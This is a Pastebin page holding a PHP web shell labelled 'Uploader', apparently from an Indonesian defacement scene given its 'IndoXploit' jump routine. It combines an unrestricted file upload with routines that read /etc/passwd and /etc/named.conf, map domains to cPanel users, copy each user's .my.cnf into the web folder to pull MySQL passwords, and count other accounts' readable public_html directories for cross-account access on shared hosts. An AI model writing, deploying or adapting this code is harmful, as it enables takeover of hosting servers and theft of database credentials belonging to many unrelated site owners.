Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // hello kids tau kan harus apa ?
- // powered by UstadCage_48
- ?>
- <title>Uploader</title>
- <style>
- body {
- color:#000;
- }
- input[type=text], input[type=file] {
- width:200px;
- border:1px solid #000;
- margin:3px;
- padding:3px;
- }
- input[type=submit] {
- border:1px solid #000;
- margin:3px;
- padding:3px;
- }
- </style>
- <center><?=php_uname();?><br><br><form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" /> <br /> <input type="text" name="ufile" value="name.php" /> <br /> <input name="upload" type="submit" value="Upload" /> <input name="" type="submit" value="Cancel" /> </form> <?php
- // Cpanel
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- /* start cpanel functions */
- function cpanel(){
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- $dc++;
- }}}
- $total = $dc;
- echo ''.$total.'';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }}}
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }}
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }}}
- $total = $dc;
- echo ''.$total.'';
- }
- }else{
- echo "0";
- }
- }
- // Local Domain
- function domain(){
- $file = @implode(@file("/etc/named.conf"));
- preg_match_all("#named/(.*?).db#",$file ,$r);
- $domains = array_unique($r[1]);
- {
- $do = "".count($domains)."";
- echo "$do";
- }}
- // Jumping
- function jump(){
- // Jump IndoXploit
- $i = 0;
- $etc = fopen("/etc/passwd", "r");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {} else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $user_idx_jump) {
- $user_jumping_dir = "/home/$user_idx_jump/public_html";
- if(is_readable($user_jumping_dir)){
- $i++;
- if(is_writable($user_jumping_dir)){}
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {} else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj){
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $user_idx_jump) {
- break;
- }}}} else {}}}}}
- if($i == 0) {
- $jump = "0";
- } else {
- $jump = "".$i."";
- }
- // Jump
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('0');
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd','r');
- if(!$passwd){die('0');}
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if($i>35){
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if(($username!=''))
- {
- if(is_readable($dirz)){ array_push($users,$username);
- array_push($pub,$dirz);
- }}}
- $i++;
- }
- echo "".sizeof($users)."/".$jump."";
- }
- if(isset($_REQUEST['ufile'])){
- $ufile = $_POST ['ufile' ] ;
- }
- if(isset($_REQUEST['upload'])){
- if($_POST ['upload']){
- if(@copy($_FILES['file']['tmp_name'],$ufile)){
- echo "<b>Uploaded !!!</b><br>" ;
- } else {
- echo "<b>Upload error !!!</b><br>" ;
- } } }
- ?>
- CPANEL : <?=cpanel();?> | DOMAIN : <?=domain();?> | JUMPING : <?=jump();?>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement